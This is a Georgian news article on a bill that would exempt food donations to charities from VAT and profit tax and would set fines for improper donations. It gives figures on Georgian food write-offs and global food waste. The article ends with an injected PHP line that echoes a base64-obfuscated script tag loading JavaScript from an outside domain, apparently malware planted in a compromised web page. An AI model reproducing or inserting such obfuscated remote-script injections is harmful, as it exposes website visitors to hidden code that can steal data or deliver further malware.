celsiusi
ავერსი შნაიდერი
სურსათის საქველმოქმედო ორგანიზაციისთვის სურსათის უსასყიდლოდ მიწოდება, შესაძლოა, გათავისუფლდეს როგორც მოგების, ისე დამატებითი ღირებულების გადასახადისგან.
შესაბამისი ცვლილებების ინიცირება ბიუროს ხვალინდელ სხდომაზე მოხდება, რომლის ინიციატორი უმრავლესობის წევრები არიან.
კანონპროექტში აღნიშნულია, რომ დღესდღეობით სურსათის შეწირულობა საქველმოქმედო ორგანიზაციაში ექვემდებარება დღგ-თი და მოგების გადასახადით დაბეგვრას, თუ შეწირულობა აჭარბებს გადამხდელის წინა კალენდარული წლის წმინდა შემოსავლის 10 პროცენტს.
დეპუტატების ინფორმაციით, 2019 წელს მოხდა 1,584 ტონა სურსათის, 2020 წელს – 1,982 ტონის, 2021 წელს კი 1,685 ტონა სურსათის ჩამოწერა.
ზემოთ აღნიშნულის გარდა, ცვლილებებით, ისეთი სურსათის შეწირულობა და გადანაწილება, რომელიც მაღალ რისკს არ უქმნის ადამიანის ან ცხოველის სიცოცხლესა და ჯანმრთელობას და რომლის სათანადო დონემდე შემცირება ან აღმოფხვრა შესაძლებელია კონკრეტული საწარმოო პროცესის დროებით შეჩერების გარეშე, გამოიწვევს მცირე ბიზნესის სტატუსის მქონე ბიზნესოპერატორის დაჯარიმებას 200 ლარის ოდენობით, სხვა ბიზნესოპერატორის დაჯარიმებას  500 ლარის ოდენობით. ამ ქმედების განმეორებით ჩადენა კი გამოიწვევს ბიზნესოპერატორის დაჯარიმებას 1 000 ლარის ოდენობით.
„სურსათის დანაკარგებისა და ნარჩენების წარმოქმნა მთელ მსოფლიოში ფუნდამენტური პრობლემაა. მსოფლიოში ადამიანის მოხმარებისთვის წარმოებული სურსათის 14 პროცენტი – დაახლოებით 400 მილიარდი დოლარის ღირებულების პროდუქტი, არ მიდის მომხმარებლამდე და იკარგება ღირებულებითი ჯაჭვის სხვადასხვა ეტაპზე.
ამავდროულად, 2019 წელს დაახლოებით 931 მლნ ტონა სურსათის ნარჩენი დაგროვდა, რომელთაგან 61 პროცენტი წარმოიქმნა ოჯახებიდან/შინამეურნეობებიდან, 26 პროცენტი – სურსათის მომსახურების ობიექტებიდან, 13 პროცენტი კი – სარეალიზაციო ქსელებიდან. ამ მონაცემებზე დაყრდნობით, შეგვიძლია დავასკვნათ, რომ მსოფლიოში წარმოებული სურსათის 17 პროცენტი იფლანგება. ამჟამად საქართველოში არ არსებობს საკანონმდებლო ბაზა, რომელიც დაარეგულირებს და წაახალისებს სურსათის შეწირულობას. ამასთან, ფისკალურად, სურსათის შეწირულობა არახელსაყრელია ბიზნესისთვის. სუპერმარკეტები უარს ამბობენ ზედმეტი საკვების გაცემაზე, რადგან შემოწირული საკვები იბეგრება დღგ-ითა (15%) და მოგების გადასახადით (18%).
ზემოაღნიშნულის გათვალისწინებით, მიზანშეწონილია როგორც ჩარჩო დოკუმენტის არსებობა, ისე წამახალისებელი მექანიზმების გამოყენება, რათა სურსათის შეწირულობა არა დამატებითი ტვირთი, არამედ მიმზიდველი ნაბიჯი გახდეს კერძო სექტორისთვის“, – აღნიშნილია კანონპროექტში.
375
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");